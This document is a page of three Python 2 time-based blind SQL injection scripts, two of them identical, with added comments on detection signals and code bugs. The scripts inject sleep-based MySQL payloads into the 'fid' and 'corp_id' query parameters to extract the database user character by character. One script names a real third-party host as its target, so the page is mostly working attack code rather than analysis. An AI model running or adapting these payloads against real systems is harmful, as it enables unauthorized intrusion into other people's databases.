时间盲注脚本
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Time-based blind SQL injection probe (Python 2: `print` statement).
#
# What the code does: for each character position 1..22 it sends one GET per
# candidate character, with a MySQL expression embedded in the `fid` query
# parameter that calls sleep(20) when the character at that position of
# user() equals the candidate and sleep(0) otherwise; a round trip longer than
# 15 s is taken as a match.
#
# Defender notes (grounded in the request shape below):
#  - Signal: a burst of up to 65 requests per position to one endpoint whose
#    query string contains `sleep(`, `sysdate()` and `substring(user()`, with
#    a latency distribution that has one ~20 s outlier per position.
#  - Root cause being probed: `fid` is concatenated into SQL; parameterized
#    queries remove the injection point, and response-time normalization /
#    rate limiting blunts the side channel.
import requests
import time

# Candidate characters tried at each position; a position whose true
# character is outside this set produces no match.
payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'  # character set used for matching

user = ''
print 'Start to retrive current user:'
for i in range(1, 23):
    for payload in payloads:  # iterate over the candidate characters
        startTime = time.time()
        # `fid` carries the injected expression; i is the 1-based position,
        # ord(payload) the ASCII code being tested.
        url = """http://XXXXX.cn/default.php?fid=1-if(now()<sysdate(),sleep(0),0)/*'XOR(if(ascii(substring(user(),""" + str(i) + """,1))=""" + str(ord(payload)) + """,sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/"""
        # timeout=30 exceeds sleep(20); a timeout raises and is not caught here.
        # The response body is never inspected -- only elapsed time matters.
        response = requests.get(url, timeout=30)
        if time.time() - startTime > 15:
            # Plain assignment: `user` holds only the most recently matched
            # character, and the final print below reports that one character.
            user = payload
            print 'user is:', user
            break  # leaves the inner loop only; the next position is still probed
print ' [Done] current user is %s' % user
#encoding=utf-8
# Time-based blind SQL injection probe (Python 2: httplib, urllib.quote,
# `print` statement).
#
# What the code does: for each position 1..20 of lower(user()) it sends one
# GET per candidate character with a MySQL expression in `corp_id` that calls
# sleep(3) on a match. The connection timeout is also 3 s, so a match surfaces
# as an exception from httplib, which the bare `except:` treats as "matched".
#
# Defender notes (grounded in the request shape below):
#  - Signal: many GETs to the same path whose `corp_id` value URL-decodes to
#    text containing `XOR(if(`, `sleep(3)` and `user()`, spaced ~3 s apart
#    after each hit.
#  - Root cause being probed: `corp_id` concatenated into SQL; parameterized
#    queries remove the injection point.
import httplib
import time
import string   # NOTE(review): not used below
import sys      # NOTE(review): not used below
import random   # NOTE(review): not used below
import urllib

headers = {}  # NOTE(review): assigned but never used
# Candidate characters tried at each position (note: uppercase stops at 'T').
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.ABCDEFGHIJKLMNOPQRST'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 21):  # 21 is the previously determined length of user() + 1
    for payload in payloads:
        try:
            # Condition on the ASCII code of the i-th character of lower(user()).
            s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
            s = "aaa'XOR(if(%s,sleep(3),0))OR'bbb" % s
            # timeout=3 equals the injected sleep(3): a match is expected to
            # time out rather than return.
            conn = httplib.HTTPConnection('kact.kingdee.com', timeout=3)  # target host
            conn.request(method='GET', url="/world/createArticle?corp_id=%s" % urllib.quote(s))
            conn.getresponse()  # response body is never read; only success/failure matters
            conn.close()
            print '.',  # progress marker, no newline (Python 2 trailing comma)
        except:
            # Bare except: any failure -- including connection errors unrelated
            # to the injected delay -- is recorded as a matched character.
            user += payload
            print ' [in progress]', user,
            time.sleep(3.0)  # pause before moving to the next position
            break
print ' [Done] MySQL user is %s' % user
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Time-based blind SQL injection probe (Python 2: `print` statement); this is
# a second copy of the `requests`-based script on this page.
#
# What the code does: for each character position 1..22 it sends one GET per
# candidate character, with a MySQL expression embedded in the `fid` query
# parameter that calls sleep(20) when the character at that position of
# user() equals the candidate and sleep(0) otherwise; a round trip longer than
# 15 s is taken as a match.
#
# Defender notes (grounded in the request shape below):
#  - Signal: a burst of up to 65 requests per position to one endpoint whose
#    query string contains `sleep(`, `sysdate()` and `substring(user()`, with
#    a latency distribution that has one ~20 s outlier per position.
#  - Root cause being probed: `fid` is concatenated into SQL; parameterized
#    queries remove the injection point, and response-time normalization /
#    rate limiting blunts the side channel.
import requests
import time

# Candidate characters tried at each position; a position whose true
# character is outside this set produces no match.
payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'  # character set used for matching

user = ''
print 'Start to retrive current user:'
for i in range(1, 23):
    for payload in payloads:  # iterate over the candidate characters
        startTime = time.time()
        # `fid` carries the injected expression; i is the 1-based position,
        # ord(payload) the ASCII code being tested.
        url = """http://XXXXX.cn/default.php?fid=1-if(now()<sysdate(),sleep(0),0)/*'XOR(if(ascii(substring(user(),""" + str(i) + """,1))=""" + str(ord(payload)) + """,sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/"""
        # timeout=30 exceeds sleep(20); a timeout raises and is not caught here.
        # The response body is never inspected -- only elapsed time matters.
        response = requests.get(url, timeout=30)
        if time.time() - startTime > 15:
            # Plain assignment: `user` holds only the most recently matched
            # character, and the final print below reports that one character.
            user = payload
            print 'user is:', user
            break  # leaves the inner loop only; the next position is still probed
print ' [Done] current user is %s' % user